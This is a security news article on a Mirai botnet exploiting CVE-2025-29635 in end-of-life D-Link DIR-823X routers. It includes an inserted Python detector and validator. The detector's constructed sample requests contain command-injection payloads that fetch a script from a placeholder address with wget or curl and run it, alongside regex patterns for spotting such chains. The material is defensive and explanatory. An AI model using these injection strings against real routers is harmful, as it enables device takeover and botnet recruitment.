Akamai has revealed that a Mirai botnet is actively exploiting a security flaw in discontinued D-Link routers. This vulnerability, identified as CVE-2025-29635, was first disclosed a year ago and remains a significant threat to users who have not retired these devices.
Understanding the Vulnerability
The vulnerability arises from a failure to validate an attacker-controlled "function" value supplied in a specially crafted POST request. Akamai explains that the router takes this value from the request body without validating it, which allows an attacker to manipulate the command buffer.
The observed activity resembles a proof-of-concept exploit published on GitHub last year, which has since been removed. The attack loads a shell script that downloads and executes a payload with Mirai characteristics, such as XOR encoding and hardcoded execution strings.
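To make the two points above concrete, here is an added illustration that is not from Akamai's report or D-Link's firmware: a scan over router request records that flags POST bodies carrying a download-and-execute stager, beside the allowlist check the vulnerable handler lacked. The handler path, the parameter name and the log records are constructed assumptions; only TEST-NET addresses are used.

```python
import re
from dataclasses import dataclass

# Constructed sample of router HTTP request records (not real traffic).
# The handler path and "function" parameter are placeholders: the article
# does not name the vulnerable endpoint.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.5", "method": "POST", "path": "/cgi-bin/PLACEHOLDER_handler",
     "body": "function=status"},
    {"src": "198.51.100.7", "method": "POST", "path": "/cgi-bin/PLACEHOLDER_handler",
     "body": "function=status;wget http://192.0.2.9/x.sh -O- | sh"},
    {"src": "203.0.113.8", "method": "GET", "path": "/index.html", "body": ""},
    {"src": "198.51.100.9", "method": "POST", "path": "/cgi-bin/PLACEHOLDER_handler",
     "body": "function=status`cd /tmp;curl -s http://192.0.2.9/d;chmod +x d;./d`"},
]

# Characters that let a parameter value escape into a shell command context.
INJECTION_CHARS = re.compile(r"[;&|`$\n]")
# Fetch-then-run chain typical of a Mirai stager script.
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl|tftp)\b.*?(\|\s*sh\b|chmod\s+\+x|\./)", re.S)
# What a hardened handler would accept: a short allowlisted token only.
ALLOWED_FUNCTIONS = {"status", "reboot", "get_config"}

@dataclass
class Finding:
    src: str
    reason: str

def validate_function_value(value):
    """Allowlist check the vulnerable firmware did not perform: the value
    must be an exact known token, so shell metacharacters can never reach
    the command buffer."""
    return value in ALLOWED_FUNCTIONS

def classify(request):
    """Return a reason when a request looks like command injection carrying
    a download-and-execute stager, else None."""
    if request["method"] != "POST":
        return None
    body = request["body"]
    if DOWNLOAD_EXEC.search(body):
        return "download-and-execute chain in POST body"
    if INJECTION_CHARS.search(body):
        return "shell metacharacter in POST body"
    return None

def scan(requests):
    findings = []
    for r in requests:
        reason = classify(r)
        if reason:
            findings.append(Finding(r["src"], reason))
    return findings
```

The validator is the fix-side counterpart: the same constructed bodies that trip the scanner are rejected outright when the function value is checked against an allowlist before use.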
Impact on D-Link Routers
The affected devices are the D-Link DIR-823X series, specifically firmware versions 240126 and 24082. These routers were discontinued last year and no longer receive software updates from D-Link, which increases the risk for users who continue to operate them.
In September, D-Link issued a warning advising users to retire these products to avoid potential security risks to connected devices. Despite this, exploitation attempts targeting these routers persist.
Wider Implications and Future Threats
Akamai notes that the attackers have also targeted vulnerabilities in TP-Link and ZTE routers, highlighting a broader threat across different brands. The ongoing Mirai malware campaigns leverage the original source code, which is easily accessible and often reused by both experienced and novice threat actors.
The low barrier to entry and the prospect of financial reward continue to draw individuals into botnet operations, posing an ongoing challenge to defenders. Users are urged to replace these devices with supported ones and to remain vigilant against evolving threats.
As cyber threats continue to evolve, it is crucial for individuals and organizations to prioritize network security and take proactive measures to safeguard their systems.
